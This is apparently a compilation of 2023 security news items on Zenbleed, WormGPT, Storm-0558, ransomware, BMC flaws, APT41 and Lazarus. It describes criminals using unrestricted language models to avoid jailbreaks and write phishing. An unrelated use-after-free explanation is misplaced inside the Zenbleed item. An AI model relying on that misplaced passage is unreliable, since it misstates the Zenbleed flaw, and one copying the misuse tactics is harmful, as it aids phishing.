Others, like the Head of IT at Confidential, Jay Leaf-Clark, argue that company security isn't just an IT problem - it’s a work culture problem.

“Fostering a strong security culture at work is key, which means empowering employees to do their part in keeping company data secure and making it easy to stay on top of—with the right tools,” he said.

He also argues that people overestimate their security habits. Citing various surveys, he said that 69% of people graded themselves As and Bs for protecting their online accounts, while 65% reused their passwords for multiple accounts. “On average, employees reuse passwords across 16 work accounts,” he added.

Cybersecurity experts have long warned of the dangers of social engineering and phishing. By being reckless and overly trusting, many workers download email attachments and click on links on social media without thinking about the consequences, often ending up causing major damages for their employer.

Source

For desktops, AMD's Ryzen 3000 series (Mattise), Ryzen 4000 and 4000G series (Renoir) are on the list; meanwhile, for mobile, list includes Ryzen 5000 (Lucienee), Ryzen 4000 (Renoir), and Ryzen 7020 (Mendocino).

AMD's security bulletin summarizes the new vulnerability which is being tracked under ID CVE-2023-20593, and also lists the AGESA firmware which will patch the Zenbleed vulnerability. Most of these are planned for release around October to December of 2023:

Summary

Under specific microarchitectural circumstances, a register in “Zen 2” CPUs may not be written to 0 correctly. This may cause data from another process and/or thread to be stored in the YMM register, which may allow an attacker to potentially access sensitive information.

CVE Details

Mitigation

AMD recommends applying the µcode patch listed below for AMD EPYC™ 7002 Processors, and applying BIOS updates that include the following AGESA™ firmware versions for other affected products. AMD plans to release to the Original Equipment Manufacturers (OEM) the AGESA™ versions on the target dates listed below. Please refer to your OEM for the BIOS update specific to your product.

DATA CENTER

DESKTOP

HIGH END DESKTOP (HEDT)

WORKSTATION

MOBILE - AMD Ryzen™ Series

Tavis Ormandy, a security vulnerability researcher at Google, discovered the flaw which they explained in their blog post. The issue is related to 128-bit registers (XMM) and incorrect recovery from a mispredicted vzeroupper. Ormandy writes:

It turns out that with precise scheduling, you can cause some processors to recover from a mispredicted vzeroupper incorrectly!

The bug works like this, first of all you need to trigger something called the XMM Register Merge Optimization, followed by a register rename and a mispredicted vzeroupper. This all has to happen within a precise window to work.

We now know that basic operations like strlen, memcpy and strcmp will use the vector registers - so we can effectively spy on those operations happening anywhere on the system! It doesn’t matter if they’re happening in other virtual machines, sandboxes, containers, processes, whatever!

This works because the register file is shared by everything on the same physical core. In fact, two hyperthreads even share the same physical register file.

In case you are unaware, Use-After-Free (UAF) is a security flaw that occurs when a program or application fails to properly manage the memory pointer after a dynamic memory portion has been freed, which in turn can lead to code execution by an attacker.

A pointer stores data related to a certain address of the memory that is being used by the application. But dynamic memory is constantly flushed and reallocated for use by different apps. However, if that pointer is not set to null once its corresponding memory space has been freed or unallocated, attackers can successfully exploit that pointer data to gain access to that same memory portion to now pass arbitrary malicious code. This is why the vulnerability is named Use-After-Free.

In a statement to Tom's Hardware, AMD suggested that performance impact, if any, will vary depending on workload and system configuration, though there are no exploitations of it in the wild.

Any performance impact will vary depending on workload and system configuration. AMD is not aware of any known exploit of the described vulnerability outside the research environment.

We will update the article if more information is available on the topic.

Source

Source

Much has been written about the potential for threat actors to use language models. With open source large language models (LLMs) such as LLaMA and Orca, and now the cybercrime model WormGPT, the trends around the commodification of cybercrime and the increasing capabilities of models are set to collide.

Threat actors are already engaging in rigorous discussions of how language models can be used for everything from identifying 0-day exploits to craft spear-phishing emails.

Open source models represent a particularly compelling opportunity for threat actors since they haven’t undergone reinforcement learning by human feedback (RLHF) focused on preventing risky or illegal answers.

This allows threat actors to actively use them to identify 0-days, write spear-phishing emails, and perform other types of cybercrime without the need for jailbreaks.

Threat exposure management firm Flare has identified more than 200,000 OpenAI credentials currently being sold on the dark web in the form of stealer logs.

While this is undoubtedly concerning, the statistic only begins to scratch the surface of threat actors' interests in ChatGPT, GPT-4, and AI language models more broadly.

Trends Collide: The Cybercrime Ecosystem and Open Source AI Language Models 

In the past five years, there has been a dramatic growth in the commodification of cybercrime. A vast underground network now exists across Tor and illicit Telegram channels in which cybercriminals buy and sell personal information, network access, data leaks, credentials, infected devices, attack infrastructure, ransomware and more.

Commercially-minded cybercriminals will likely increasingly employ quickly proliferating open source AI language models. The first such application, WormGPT has already been created and is being sold for a monthly access fee.                                                 

Customized Spear-Phishing at Scale

Phishing-a-a-Service (PhaaS) already exists and provides ready-made infrastructure to launch phishing campaigns from a monthly fee.

There are already extensive discussions among threat actors using WormGPT to facilitate broader, personalized phishing attacks.

The use of generative AI will likely enable cybercriminals to launch attacks against thousands of users with customized messages gleaned from data from social media accounts, OSINT sources, and online databases, dramatically increasing the threat to employees from email phishing.

"Tomorrow, API-WormGPT will be provided by Galaxy dev channel, the request status is unlimited and will be calculated periodically, and to use API-WORMGPT, you need to get an API-KEY. The latest news will be announced," a threat actor advertises WormGPT on Telegram.

"If you don't know what WORMGPT is: This WORMGPT is an unlimited version of CHATGPT, designed by hackers and made for illegal work, such as phishing and malware, etc. without any ethical sources."

Automated Exploit & Exposure Identification

Projects such as BabyAGI seek to use language models to loop on thoughts and carry out actions online, and potentially in the real world. As things stand today, many companies don’t have full visibility of their attack surface.

They rely on threat actors not quickly identifying unpatched services, credentials and API keys exposed in public GitHub repositories, and other forms of high-risk data exposure.

Semi-autonomous language models could quickly and abruptly shift the threat landscape by automating exposure detection at scale for threat actors.

Right now threat actors rely on a mix of tools used by cybersecurity professionals and manual effort to identify exposure that can grant initial access to a system.

We are likely years, or even months away from systems that can not only detect obvious exposure such as credentials in a repository, but even identify new 0-day exploits in applications, dramatically decreasing the time security teams have to respond to exploits and data exposure.

Vishing and Deepfakes

Advances in generative AI also look set to create an extremely challenging environment for vishing attacks. AI driven services can already realistically copy the sound of an individual's voice with less than 60 seconds of audio, and deepfake technology continues to improve.

Right now deep fakes remain in the uncanny valley, making them somewhat obvious. However the technology is rapidly progressing and researchers continue to create and deploy additional open source projects.

Hacking & Malware Generative AI Models

Open source LLMs already exist focused on red teaming activities such as pen-test GPT.

The functionality and specialization of a model largely depends on a multi-step process involving the data the model is trained on, reinforcement learning with human feedback, and other variables.

"There are some promising open source models like orca which has promise for being able to find 0days if it was tuned on code," explains a threat actor discussing Microsoft's Orca LLM.

What Does this Mean for Security Teams?

Your margin for error as a defender is about to drop substantially. Reducing SOC noise to focus on high-value events, and improving mean time to detect (MTTD) and mean time to respond (MTTR) for high-risk exposure whether on the dark or clear web should be a priority. 

AI adoption for security at companies will likely move considerably more slowly than it will for attackers, creating an asymmetry that adversaries will attempt to exploit.

Security teams must build an effective attack surface management program, ensure that employees receive substantial training on deepfakes & spear-phishing, but beyond that, evaluate how AI can be used to rapidly detect and remediate gaps in your security perimeter.

Security is only as strong as the weakest link, and AI is about to make that weak link much easier to find.

About Eric Clay

Eric is the Security Researcher at Flare, a threat exposure monitoring platform. He has experience in security data analytics, security research, and applications of AI in cybersecurity.

Sponsored and written by Flare

Source

With the release of Windows 11 22H2, Microsoft introduced a new security feature called Enhanced Phishing protection, designed to protect your Windows and Active Directory domain credentials from being obtained by threat actors.

One of the most common methods threat actors use to gain access to websites or a corporate network is to purchase or steal corporate credentials. These credentials are obtained initially through phishing attacks or via information-stealing malware.

Threat actors use these stolen credentials to access other accounts used by the Windows user, including email accounts, bank accounts, and cryptocurrency trading accounts. Even worse, these stolen accounts can be used to access corporate networks, allowing the hackers to spread laterally on a network to conduct BEC scams, data theft, supply chain attacks, and ransomware attacks.

The number of stolen credentials is a massive and widespread problem, with cybercrime marketplaces selling billions of credentials and authentication cookies and more specialized sites selling over a million remote desktop credentials.

Due to this widespread abuse, law enforcement has been actively targeting stolen credential marketplaces in law enforcement operations, seizing the WT1SHOP in 2022, and, more recently, taking down the Genesis Market.

Windows 11's Enhanced Phishing Protection

When Microsoft first released the new Windows Enhanced Phishing protection, it only warned users when they manually typed their Windows password into a document or web login page.

However, as it's commonly advised that users use password managers to create strong and unique passwords for all their logins, many people copy and paste their passwords from the password manager into their login prompts.

As the feature did not previously protect against copy and paste, this would bypass the Windows security feature.

With the release of Windows 11 Insider Dev build 23506, Microsoft has enhanced the phishing protection feature by now detecting the copy and paste of a user's Windows password.

"We are trying out a change starting with this build where users who have enabled warning options for Windows Security under App & browser control > Reputation-based protection > Phishing protection will see a UI warning on unsafe password copy and paste, just as they currently see when they type in their password," reads the Dev build release notes.

As this feature is not enabled by default, Windows users should turn it on by going to Windows Security > App & browser control > Reputation-based protection > Phishing protection and putting checkmarks under all three options, as shown below.

Once enabled, this feature will warn users when they type or copy and paste their Windows logon password into website forms or documents.

This alert will be titled "Password reuse is a security risk," and warns users to reset their Windows account password, linking to this support document.

"If your password is stolen from this site, attackers will true to use it other sites too. Use strong, unique passwords to keep your personal information safe," reads the Windows phishing protection alert.

"Microsoft recommends changing your local Windows account password."

While our previous Windows Enhanced Phishing Protection test showed that it did not work with certain applications, such as Firefox and Excel, today's tests show that this has been fixed, making the feature more robust.

However, it still does not work with other third-party applications that could commonly be used to store passwords, such as Notepad2, Notepad++, and likely many others.

Microsoft has also introduced a new "Warn others about suspicious apps and sites" phishing protection setting, but there is no information about this new setting and who 'others' represents.

Microsoft has not answered our questions related to this new setting.

Finally, it must be noted that the Windows 11 Phishing protection feature does not work if you use Windows Hello, such as PIN or biometrics, to log in to Windows.

For this feature to work, Windows users must log in with a password so it is cached in memory and can be compared to inputted text (typed or copied and pasted).

As this feature can be a powerful tool to protect corporate credentials, instantly alerting admins when a user is reusing their Windows password, trading the convenience of Windows Hello for better security is worth it.

It is recommended that all Windows users enable this security feature in Windows Security, even if it does not support all applications now.

Source

Redmond revealed on July 12th that the attackers had breached the Exchange Online and Azure Active Directory (AD) accounts of around two dozen organizations. This was achieved by exploiting a now-patched zero-day validation issue in the GetAccessTokenForResourceAPI, allowing them to forge signed access tokens and impersonate accounts within the targeted organizations.

The affected entities included government agencies in the U.S. and Western European regions, with the U.S. State and Commerce Departments among them.

On Friday, Wiz security researcher Shir Tamari said that the impact extended to all Azure AD applications operating with Microsoft's OpenID v2.0. This was due to the stolen key's ability to sign any OpenID v2.0 access token for personal accounts (e.g., Xbox, Skype) and multi-tenant AAD apps.

Microsoft clarified after the publishing of this article that it only impacted those that accepted personal accounts and had the validation error.

While Microsoft said that only Exchange Online and Outlook were impacted, Wiz says the threat actors could use the compromised Microsoft consumer signing key to impersonate any account within any impacted customer or cloud-based Microsoft application.

"This includes managed Microsoft applications, such as Outlook, SharePoint, OneDrive, and Teams, as well as customers' applications that support Microsoft Account authentication, including those who allow the 'Login with Microsoft' functionality," Tamari said.

"Everything in the world of Microsoft leverages Azure Active Directory auth tokens for access," Wiz CTO and Cofounder Ami Luttwak also told BleepingComputer.

"An attacker with an AAD signing key is the most powerful attacker you can imagine, because they can access almost any app – as any user. This is the ultimate cyber intelligence' shape shifter' superpower."

In response to the security breach, Microsoft revoked all valid MSA signing keys to ensure that the threat actors didn't have access to other compromised keys.

This measure also thwarted any attempts to generate new access tokens. Further, Redmond relocated the newly generated access tokens to the key store for the company's enterprise systems.

After invalidating the stolen signing key, Microsoft found no further evidence suggesting additional unauthorized access to its customers' accounts using the same auth token forging technique.

Additionally, Microsoft reported observing a shift in Storm-0558 tactics, showing that the threat actors no longer had access to any signing keys.

Last but not least, the company revealed last Friday that it still doesn't know how the Chinese hackers stole the Microsoft consumer signing key. However, after pressure from CISA, they agreed to expand access to cloud logging data for free to help defenders detect similar breach attempts in the future.

Before this, these logging capabilities were only available to Microsoft customers who paid for Purview Audit (Premium) logging license. As a result, Microsoft faced considerable criticism for impeding organizations from promptly detecting Storm-0558 attacks.

"At this stage, it is hard to determine the full extent of the incident as there were millions of applications that were potentially vulnerable, both Microsoft apps and customer apps, and the majority of them lack the sufficient logs to determine if they were compromised or not," Tamari concluded today.

Update 7/22/23: Updated article with clarifications from Microsoft.

Source

Last month, a new ransomware operation named NoEscape (or No_Escape) was launched that quickly began amassing a stream of new corporate victims.

After the operation's encryptor was analyzed, it soon became apparent that NoEscape was a rebrand of Avaddon, who shut down their operation in June 2020 after feeling the heat from law enforcement.

However, it looks like the gang never really retired but was simply biding their time until they could return as the new NoEscape operation, likely previously working in other operations.

While the gang has claimed not to have any affiliation with Avaddon, their encryptor is very similar to the former operation's ransomware, according to ransomware expert Michael Gillespie.

This includes a unique encryption chunking routine only used by Avaddon, similarities in code, the same configuration file format, and many other routines. The only significant change was the switch from AES encryption to Salsa20.

Law enforcement has been busy, arresting a Ukrainian scareware developer after a 10-year hunt and an IT employee sentenced to over three years in prison for impersonating a ransomware gang in an extortion scheme.

In other ransomware reports from BleepingComputer and cybersecurity firms:

• A new SophosEncrypt ransomware impersonates Sophos
• FIN8 threat actors were seen deploying the ALPHV ransomware using Sardonic malware
• The new Big Head ransomware displays fake Windows update alerts

Finally, Clop's data theft attacks using the MOVEit Transfer zero-day continue to be a hot topic in the news, with companies continuing to disclose data breaches as they are added to the gang's data leak site.

According to a new Coveware report released today, these attacks have been very successful, with the ransomware gang expected to earn $75-100 million in extortion payments.

Contributors and those who provided new ransomware information and stories this week include: @demonslay335, @Seifreed, @BleepinComputer, @malwrhunterteam, @billtoulas, @Ionut_Ilascu, @struppigel, @fwosar, @LawrenceAbrams, @serghei, @chainalysis, @TrendMicro, @Intel_by_KELA, @pcrisk, @SophosXOps, @coveware, @BroadcomSW, @pcrisk, and @azalsecurity.

July 8th 2023

New ‘Big Head’ ransomware displays fake Windows update alert

Security researchers have dissected a recently emerged ransomware strain named ‘Big Head’ that may be spreading through malvertising that promotes fake Windows updates and Microsoft Word installers.

New Makop Ransomware variant

PCrisk found new Makop ransomware variants that appends the .rajah and drops a ransom note named +README-WARNING+.txt.

New STOP Ransomware variants

PCrisk found new STOP variants that append the .gayn and .gazp extensions.

July 12th 2023

Ransomware payments on record-breaking trajectory for 2023

Data from the first half of the year indicates that ransomware activity is on track to break previous records, seeing a rise in the number of payments, both big and small.

New STOP Ransomware variants

PCrisk found new STOP variants that append the .waqq and .gaqq extensions.

New Chaos ransomware variant

PCRisk found a new Chaos variant that appends the .hackedbySnea575 extension and drops a ransom note named README_txt.txt.

July 14th 2023

Shutterfly says Clop ransomware attack did not impact customer data

Shutterfly, an online retail and photography manufacturing platform, is among the latest victims hit by Clop ransomware.

July 17th 2023

Meet NoEscape: Avaddon ransomware gang's likely successor

The new NoEscape ransomware operation is believed to be a rebrand of Avaddon, a ransomware gang that shut down and released its decryption keys in 2021.

Police arrests Ukrainian scareware developer after 10-year hunt

The Spanish National Police has apprehended a Ukrainian national wanted internationally for his involvement in a scareware operation spanning from 2006 to 2011.

IT worker jailed for impersonating ransomware gang to extort employer

28-year-old Ashley Liles, a former IT employee, has been sentenced to over three years in prison for attempting to blackmail his employer during a ransomware attack.

New STOP Ransomware variants

PCrisk found new STOP variants that append the .miza, .mitu, and .miqe extensions.

New Xorist variant

PCrisk found a new Xorist variant that appends the .PrO extension and drops a ransom note named HOW TO DECRYPT FILES.txt.

July 18th 2023

Cybersecurity firm Sophos impersonated by new SophosEncrypt ransomware

Cybersecurity vendor Sophos is being impersonated by a new ransomware-as-a-service called SophosEncrypt, with the threat actors using the company name for their operation.

FIN8 deploys ALPHV ransomware using Sardonic malware variant

A financially motivated cybercrime gang has been observed deploying BlackCat ransomware payloads on networks backdoored using a revamped Sardonic malware version.

July 19th 2023

Estée Lauder beauty giant breached by two ransomware gangs

Two ransomware actors, ALPHV/BlackCat and Clop, have listed beauty company Estée Lauder on their data leak sites as a victim of separate attacks.

July 20th 2023

Kanti: A NIM-Based Ransomware Unleashed in the Wild

New programming languages often have fewer security measures and less mature detection mechanisms than well-established ones. Threat Actors (TAs) often attempt to bypass traditional security defenses and avoid detection by using a less-known programming language.

New Khronos ransomware

PCrisk found a new Kronos ransomware that appends the .khronos extension and drops a ransom note named info.hta.

July 21st, 2023

Clop gang to earn over $75 million from MOVEit extortion attacks

The Clop ransomware gang is expected to earn between $75-100 million from extorting victims of their massive MOVEit data theft campaign.

Ransom Monetization Rates Fall to Record Low Despite Jump In Average Ransom Payments

In the second quarter of 2023, the percentage of ransomware attacks that resulted in the victim paying, fell to a record low of 34%. The trend represents the compounding effects that we have noted previously of companies continuing to invest in security, continuity assets, and incident response training. Despite these encouraging statistics, ransomware threat actors and the entire cyber extortion economy, continue to evolve their attack and extortion tactics.

Bl00dy ransomware gang returns

AzAl Security noted that the ransomware gang is recruiting new affiliates, but requires a payment first.

Bl00dy ransomware has now advertised in RAMP forum and is asking 10k USD to join their affiliate program. This is half the price of Lockbits fee. Bl00dy appears to have felt some heat and is looking to be more covert. Notably, the poster appears to be a native English speaker.

New STOP Ransomware variants

PCrisk found new STOP variants that append the .kiqu and .kizu extensions.

New Black Hunt 2.0 ransomware

PCrisk found a new Kronos ransomware that appends the .Hunt2 and drops ransom notes named #BlackHunt_ReadMe.txt and #BlackHunt_ReadMe.hta.

That's it for this week! Hope everyone has a nice weekend!

Source

The data leak impacted only Premium account customers, with the uploaded file containing their names and corporate email addresses.

Emiliano Martines, the online malware scanning service's head of product management, also assured impacted customers that the incident was caused by human error and was not the result of a cyber-attack or any vulnerability with VirusTotal.

Furthermore, the leaked file was only accessible to VirusTotal partners and cybersecurity analysts with a Premium account with the platform.

Those using anonymous or free accounts cannot access the Premium platform and, consequently, cannot reach the leaked file.

"On June 29, an employee accidentally uploaded a CSV file to the VirusTotal platform. This CSV file contained limited information of our Premium account customers, specifically the names of companies, the associated VirusTotal group names, and the email addresses of group administrators," Martines said on Friday.

"We removed the file, which was only accessible to partners and corporate clients, from our platform within one hour of its posting."

Leaked info linked to government agencies worldwide

German news outlets Der Spiegel and Der Standard were the first to report the incident on Monday.

As they reported, the 313KB leaked file contained details concerning accounts associated with official U.S. entities, including the Cyber Command, Department of Justice, Federal Bureau of Investigation (FBI), and the National Security Agency (NSA). 

Additionally, the file included accounts linked to government agencies in Germany, the Netherlands, Taiwan, and the United Kingdom.

"It is a list of 5600 names, including employees of the US intelligence service NSA and German intelligence services," Der Spiegel said.

"Twenty accounts alone lead to the 'Cyber Command' of the USA, part of the American military and hub for offensive and defensive hacking operations. Also represented: the US Department of Justice, the US Federal Police FBI, and the Secret Service NSA."

The file also contained information on employees of national authorities in the Netherlands, Taiwan, and the United Kingdom, as well as German government agencies, including the Federal Intelligence Service, the Federal Police, and the Military Counterintelligence Service (MAD).

Information on dozens of employees at Bundesbank, Deutsche Bahn, Allianz, BMW, Mercedes-Benz, and Deutsche Telekom was also found in the leaked file.

Source

Amazon has offered Alexa voice-activated products and services targeted at children under 13 years old since May 2018.

In May 2023, the Federal Trade Commission (FTC) and the U.S. Department of Justice (DOJ) filed charges against Amazon, accusing the company of violating children's privacy laws, which include the FTC Act, the Children's Online Privacy Protection Act (COPPA), and the COPPA Rule.

The charges were brought after Amazon failed to comply with parents' requests to delete their children's voice recordings and geolocation information.

According to the complaint, Amazon "failed for a significant period of time to honor parents' requests that it delete their children's voice recordings by continuing to retain the transcripts of those recordings and failing to disclose that it was doing so, also in violation of COPPA."

Furthermore, the company should have deleted users' voice information and geolocation data upon request but instead chose to retain that information for its potential use.

Ring subsidiary also facing a $5 million fine

Amazon also faces a $5 million fine for privacy violations associated with its Ring video doorbell service.

The fine stems from the alleged actions of employees with Amazon's Ring home security camera subsidiary, who are accused of engaging in unlawful surveillance of customers and failing to adequately prevent hackers from seizing control of users' cameras.

"While we disagree with the FTC's claims regarding both Alexa and Ring, and deny violating the law, these settlements put these matters behind us," Amazon told BleepingComputer after FTC's complaint was filed in May.

"As part of the settlement, we agreed to make a small modification to our already strong practices, and will remove child profiles that have been inactive for more than 18 months unless a parent or guardian chooses to keep them."

In March 2022, the FTC slapped Fortnite maker Epic Games with a $245 million fine (down from a proposed $520 million penalty) for breaching children's privacy laws and employing deceptive tactics, known as dark patterns, to manipulate millions into making unintentional in-game purchases.

More recently, Microsoft also reached an agreement to pay a $20 million fine and update its data privacy protocols concerning children.

This resolution came as a settlement for charges brought by the Federal Trade Commission (FTC) pertaining to violations of the Children's Online Privacy Protection Act (COPPA) linked to Microsoft's Xbox Live service.

Source

Cybersecurity researchers from Eclypsium have discovered two critical vulnerabilities in the AMI MegaRAC Baseboard Management Controller (BMC) software. 

The software is designed to provide IT teams with full access to cloud center servers, allowing them to reinstall operating systems, manage apps, and manage the endpoints even when they’re turned off. In industry slang, the software allows for “out-of-band” and “lights-out” remote system management. 

The two flaws are tracked as CVE-2023-34329 (authentication bypass via HTTP header spoofing) with a 9.9 severity score, and CVE-2023-34330 (code injection via Dynamic Redfish Extension interface) with an 8.2 severity score. By chaining these vulnerabilities, threat actors could use the Redfish remote management interface and gain remote code execution capabilities on vulnerable servers. Given the tool’s popularity, this could mean millions of servers, as the vulnerable firmware is used by some of the world’s greatest server manufacturers that service high-profile cloud service and data center providers: AMD, Asus, ARM, Dell EMC, Gigabyte, Lenovo, Nvidia, Qualcomm, HPE, Huawei, and more. 

The destructive potential is quite extensive, the researchers said, as threat actors could gain access to sensitive data, install ransomware, trojans, or even brick the servers by putting them in an unstoppable neverending reboot loop.

"We also need to emphasize that such an implant can be extremely hard to detect, and is extremely easy to recreate for any attacker in the form of a one-line exploit," the researchers warned in their writeup.

A patch has since been made available by AMI, who advised its customers to apply it immediately, as that is the best way to protect against potential compromise.

Analysis: Why does it matter?

The flaws matter due to their enormous destructive potential. As these are found in a supplier of hardware components, they can trickle down to many cloud service providers, affecting countless organizations. Vulnerabilities such as these two are equal to hitting the motherlode of supply chain attacks. 

It all started roughly two years ago when a threat actor going by the name of RansomEXX compromised the endpoints belonging to the computer hardware giant GIGABYTE. The crooks stole more than 100 gigabytes of sensitive data, including information belonging to Intel, AMD, and, among others - AMI. The data was subsequently leaked to the dark web, where it was picked up by cybersecurity researchers from Eclypsium (as well as others, and possibly - many malicious actors). 

The researchers uncovered two zero-days that had been lurking among the data for years. It includes using the Redfish remote management interface to gain remote code execution capabilities. Redfish, Ars Technica explains in its writeup, as a successor to traditional IPMI providers, and offers an API standard to manage server infrastructure and other infrastructure needed for today’s data centers. It’s supported by practically all server and infrastructure vendors and the OpenBMC firmware project. 

The flaws are found in BMCs - Baseboard Management Controller software. These grant administrators “god mode” status over the servers they manage. As per Ars Technica, AMI is the leading provider of BMCs and BMC firmware and services a wide range of hardware vendors and cloud service providers, including the biggest household names. 

The researchers also added that after analyzing publicly available source code, they were able to find the vulnerabilities and write malware, stating that any malicious actor out there could do the same. Even if they had no access to the source code, they could still identify the flaws by decompiling MBC firmware images. The good news is that there’s still no evidence anyone’s done just that.

What have others said about the flaws?

For HD Moore, the CTO and co-founder at runZero, it’s now pivotal that potentially affected customers patch their systems immediately: “The attack chain identified by Eclypsium allows a remote attacker to completely and possibly permanently compromise vulnerable MegaRAC BMCs,” he said. “This attack would be 100% reliable and difficult to detect after the fact.”

He added that updating flawed AMI firmware shouldn’t be too troublesome if environments either have automated their patching, or if they have configured BMC-enabled ethernets, used for out-of-band administration, to use a dedicated network. 

While Twitter users were generally quiet on the news, a user named Secure ICS OT, which tweets ICS and ICS security-related tweets, commented: “Laughs in on-premise isolated network,” suggesting that’s the best way to stay secure. On Reddit, users were more talkative, with one user downplaying the importance of the findings: “This isn't as bad as it sounds. How many places have their BMC open to the net? If they have access then they are already on your network anyway and you have bigger issues,” they said. 

“I would assume most data centers have BMCs, iDRACs, lifecycle controllers, etc on a management VLAN, so they have some level of protection,” another user added. “On the other hand, there’s the 1.8 bajillion small businesses running one Dell T450 on 192.168.1.x.”

Source

APT41 is one of the oldest state hacking groups with a history of targeting various industries in the USA, Asia, and Europe.

They are known for conducting cyber-espionage operations against entities across various industry sectors, including software development, hardware manufacturing, think tanks, telcos, universities, and foreign governments.

The group has been tracked under various names by multiple cybersecurity companies. Kaspersky has been monitoring their activity since 2012 as Winnti to identify the malware employed in their attacks.

Similarly, Mandiant has also been tracking them since 2014 and noticed their activities overlapped with other known Chinese hacking groups like BARIUM.

The U.S. Department of Justice charged five Chinese nationals linked to APT41 in September 2020 for their involvement in cyberattacks on more than 100 companies.

"Unlike many nation-state-backed APT groups, APT41 has a track record of compromising both government organizations for espionage, as well as different private enterprises for financial gain," Lookout said in a report published this week.

The Android spyware link

While APT41 hackers usually breach their targets' networks via vulnerable web apps and Internet-exposed endpoints, Lookout says the group also targets Android devices with WyrmSpy and DragonEgg spyware strains.

Lookout first identified WyrmSpy in 2017 and DragonEgg in early 2021, with the most recent example dating back to April 2023.

Both Android malware strains come with extensive data collection and exfiltration capabilities activated on compromised Android devices after deploying secondary payloads.

While WyrmSpy disguises itself as a default operating system app, DragonEgg is camouflaged as third-party keyboard or messaging apps, using these guises to evade detection.

The two malware strains also share overlapping Android signing certificates, strengthening their connection to a single threat actor.

Lookout discovered their link to APT41 after finding a command-and-control (C2) server with the 121.42.149[.]52 IP address (resolving to the vpn2.umisen[.]com domain and hard-coded into the malware source code).

The server was part of APT41's attack infrastructure between May 2014 and August 2020, as revealed in the U.S. Department of Justice's September 2020 indictment.

"Lookout researchers have not yet encountered samples in the wild and assess with moderate confidence that they are distributed to victims through social engineering campaigns. Google confirmed that based on current detection, no apps containing this malware are found to be on Google Play," Lookout said.

However, APT41's interest in Android devices "shows that mobile endpoints are high-value targets with coveted data."

Source

The campaign was linked to the North Korean state-sponsored Lazarus hacking group, also known as Jade Sleet (Microsoft Threat Intelligence) and TraderTraitor (CISA). The US government released a report in 2022 detailing the threat actors' tactics.

The hacking group has a long history of targeting cryptocurrency companies and cybersecurity researchers for cyberespionage and to steal cryptocurrency.

Targeting developers with malware

In a new security alert, GitHub warns that the Lazarus Group is compromising legitimate accounts or creating fake personas that pretend to be developers and recruiters on GitHub and social media.

"GitHub has identified a low-volume social engineering campaign that targets the personal accounts of employees of technology firms, using a combination of repository invitations and malicious npm package dependencies," explained the GitHub security alert.

These personas are used to contact and initiate conversations with developers and employees in the cryptocurrency, online gambling, and cybersecurity industries. These conversations commonly lead to another platform, which in past campaigns was WhatsApp.

After establishing trust with the target, the threat actors invite them to collaborate on a project and clone a GitHub repository themed around media players and cryptocurrency trading tools.

However, GitHub says these projects utilize malicious NPM dependencies that download further malware to targets' devices.

While GitHub only shared that the malicious NPM packages act as a first-stage malware downloader, they referenced a June report by Phylum that goes into more detail regarding the malicious NPMs.

According to Phylum, the NPMs act as malware downloaders that connect to remote sites for additional payloads to execute on the infected machine.

Unfortunately, the Phylum researchers could not receive the second-stage payloads to see the final malware delivered to the device and  analyze the executed maliciious behavior.

"Whatever the reason, it's certain this is the work of a reasonably sophisticated supply-chain threat actor," concluded the Phylum researchers.

"This attack in particular stands out due to its unique execution chain requirements: a specific installation order of two distinct packages on the same machine."

"Moreover, the presumed malicious components are kept out of sight, stored on their servers, and are dynamically dispatched during execution."

GitHub says that they have suspended all NPM and GitHub accounts and published a complete list of indicators regarding the domains, GitHub accounts, and NPM packages associated with the campaign.

The company also emphasizes that no GitHub or npm systems were compromised during this campaign.

This campaign is similar to a Lazarus campaign in January 2021, when the threat actors targeted security researchers in social engineering attacks using elaborate fake "security researcher" social media personas to infect targets with malware.

This was done by convincing the researchers to collaborate on vulnerability development by distributing malicious Visual Studio projects for alleged vulnerability exploits that installed a custom backdoor.

A similar campaign was conducted in March 2021 when the hackers created a website for a fake company named SecuriElite to infect researchers with malware.

Other past Lazarus attacks

North Korean hackers have a long history of targeting cryptocurrency companies and developers to steal assets to fund their country's initiatives.

Lazarus began targeting cryptocurrency users by spreading trojanized cryptocurrency wallets and trading apps to steal users' crypto wallets and the funds within them.

In April 2022, the U.S. Treasury and the FBI linked the Lazarus group to the theft of over $617 million worth of Ethereum and USDC tokens from the blockchain-based game Axie Infinity.

It was later disclosed that the threat actors sent a malicious laced PDF file pretending to be a lucrative job offer to one of the blockchain's engineers as part of this attack.

The use of fake employment opportunities to deliver malware was also used in a 2020 campaign called "Operation Dream Job" that targeted employees in prominent defense and aerospace companies in the US.

Source

Under adjustments to the law, tech companies would be forced to show the Home Office any security features and have them approved before releasing them to the public. If the Home Office doesn’t like the feature, it can make the company disable the security feature in question immediately, without telling the public.

According to the BBC, the Home Office already has these powers but there has to be a review and there can be an independent oversight process. Tech firms also have the ability to make an appeal before they make any change.

Under the adjustments to the law, tech companies would have to disable the features right away. In its current state, there is still a high level of secrecy around demands made by the Home Office and it’s not known how many have been issued or complied with.

Apple has listed to following comments about the proposed amendments:

• It would not make changes to security features specifically for one country that would weaken a product for all users.
• Some changes would require issuing a software update so could not be made secretly
• The proposals "constitute a serious and direct threat to data security and information privacy" that would affect people outside the UK

If the law does go ahead, it’ll be interesting to see whether Apple really follows up on its threats to pull out of the UK. Its blue-bubble iMessage feature is regularly held up as a soft power tactic Apple uses to shame younger, more impressionable people, into using an iPhone over an Android phone.

Source: BBC News

Source

The ban prohibits the practice unless the company secures explicit consent from Norwegian users to process their personal data.

Meta extensively monitors the users' actions, meticulously tracking their activities across its platforms, according to the Norwegian DPA.

The company uses content preferences, the info they post on Facebook and Instagram, and their location information to build personalized profiles that simplify targeted advertising, a tactic commonly known as behavioral advertising.

"The Norwegian Data Protection Authority considers that the practice of Meta is illegal and is therefore imposing a temporary ban of behavioural advertising on Facebook and Instagram," the data protection agency said.

"The Norwegian Data Protection Authority does not ban personalised advertising on Facebook or Instagram as such. The decision does not for example stop Meta from targeting advertising based on information a user put in their bio, such as place of residence, gender and age, or based on interests a user has provided themselves."

Failure to comply with the decision would come with a daily penalty of roughly $100,000, as enforced by the Norwegian DPA.

While this is only a temporary ban of three months starting August 4th (due to the agency's limited authority), the privacy watchdog says it's considering reaching out to the European Data Protection Board (EDPB) to extend the decision beyond the initial three-month ban.

€390 million behavioral advertising fine

In December 2022, the Irish Data Protection Commission (DPC) fined Meta a total of €390 million (~$438 million) for conducting illegal behavioral advertising, forcing Facebook and Instagram users to consent to personal data processing for targeted advertising.

The Irish DPC also ordered Meta to bring its current data processing operations into compliance with GDPR's regulations within the next three months.

